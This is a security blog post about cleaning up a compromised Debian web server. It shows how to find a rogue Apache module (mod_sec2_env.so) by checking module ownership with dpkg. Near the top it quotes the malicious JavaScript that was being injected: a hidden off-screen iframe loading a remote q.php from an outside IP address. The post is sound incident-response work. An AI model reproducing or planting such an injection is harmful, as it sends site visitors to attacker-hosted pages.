• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Web Server Compromise – Debian Distro – Identify and Remove Corrupt Apache Modules

February 6, 2013Tony Perez

0
SHARES
FacebookTwitterSubscribe

Came across another server compromise this week. Client was complaining that the following kept being injected into their JavaScript files:

document.write("<style.vb4brk { position:absolute; left:-1655px; top:-1476px} </style> 
<div class="vb4rk"><iframe 
src="httx:// 149.47.154.253/fee1f3119b234cb79f953e92281b12af/q.php" width="231" height="330">
</iframe></div>'); /*!

Fortunately, the client was working off a VPS. Doing so allowed us to dig deeper into the server and better address the issue. Looking at the server we quickly realized that a bad module had been injected. Unfortunately, because this was a Debian distribution, as such you can’t run the commands we provided in our last post.

Become Oriented

If you work on various NIX distributions you’ll always want to get your orientation. What OS are you working with? How’s it configured? Every box is different so take a few minutes up front and get your baseline, will work wonders as you continue your investigation.

Check your version:

# cat /proc/version 

- or -

cat /etc/*-release

In my case, the version worked:

# cat /proc/version
Linux version 2.6.26-2-amd64 (Debian 2.6.26-25lenny1) (dannf@debian.org) ...
httpd, you'll have to look for apache2. And to see the compiled modules you'll want to leverage this:
# apache2 -l

Sample output:

Compiled in modules:
  core.c
  mod_log_config.c
  mod_logio.c
  prefork.c
  http_core.c
  mod_so.c

To identify what modules are being loaded you'll run this:

# apache2ctl -M

Sample output:

Loaded Modules:
 core_module (static)
 log_config_module (static)
 logio_module (static)
 mpm_prefork_module (static)
 http_module (static)
 ........

Now Find and Remove

The easiest way to identify whether your Apache install has been configured on your Debian distro is to identify where the apache modules are being loaded from, then check their ownership.

# grep -r ".so" /path/to/your/Apache/install/

This would provide you a list of all the modules and where they are being loaded from, something like this:

# grep -r ".so" .
./mods-available/file_cache.load:LoadModule file_cache_module /usr/lib/apache2/modules/mod_file_cache.so
./mods-available/usertrack.load:LoadModule usertrack_module /usr/lib/apache2/modules/mod_usertrack.so
etc ...

You should notice the location here:

/usr/lib/apache2/modules/

You also want to know that there are two different directories in the Apache install:

/etc/apache2/mods-available/

and 

 /etc/apache2/mods-enabled/

The names give it away. But don't be fooled, that won't serve you much good when looking for a bad module. A more effective approach will be to run dpkg in the modules directory. This is similar to our recommendation in the last post of using rpm to identify which packages own the modules:

# dpkg -S /usr/lib/apache2/modules/*

If you check the man page for dpkg you'll see that the S option is good to identify the ownership:

  -S|--search  ...        Find package(s) owning file(s).

Running that you would likely see something like this:

dpkg: /usr/lib/apache2/modules/mod_sec2_env.so not found.

And yes, that is the bad module: mod_sec2_env.so

Remove the module and that should get you back up and going. FYI, if you would have focused solely on the /mod-available or /mods-enabled directories you would have missed this as the module referencing the bad one was legitimate:

./mods-available/include.load

Cheers.


If you find yourself with similar issues, or think you are suffering a compromise please send us a note info@sucuri.net

0
SHARES
FacebookTwitterSubscribe

Categories: Security Education, Web ProsTags: Hacked Websites, Server Security, Webserver Infections

About Tony Perez

Tony is the Head of Security Products at GoDaddy and Sucuri Co-Founder. His passion lies in educating and bringing awareness about online threats to business owners. His passions revolve around understanding the psychology of bad actors, the impacts and havoc hacks have on website owners, and thinking through the evolution of attacks. You can find his personal thoughts on security at perezbox.com and you can follow him on Twitter at @perezbox.

Reader Interactions

Comments

  1. yepi kizi

    March 14, 2013

    Thank you for this post, It was a great read which was extremely helpful.

  2. Yepi Friv

    March 21, 2013

    Thanks a lot for sharing with us very detail article

  3. kizi

    March 27, 2013

    Very detail instruction. I’ll follow you daily

    • JoeDog

      April 3, 2013

      If he was as good as you let on, he would have deleted this link spam….

  4. Tim Stoop

    April 3, 2013

    Very nice, we’ve created an Icinga check for this, detailed here: https://blog.kumina.nl/2013/04/checking-for-rogue-apache-modules/

  5. Alen

    June 7, 2013

    How do you prevent this from happening again?

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

How to Add Security to Customer Websites Email Course

Referral Program Guide

Website Security for your Customers

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.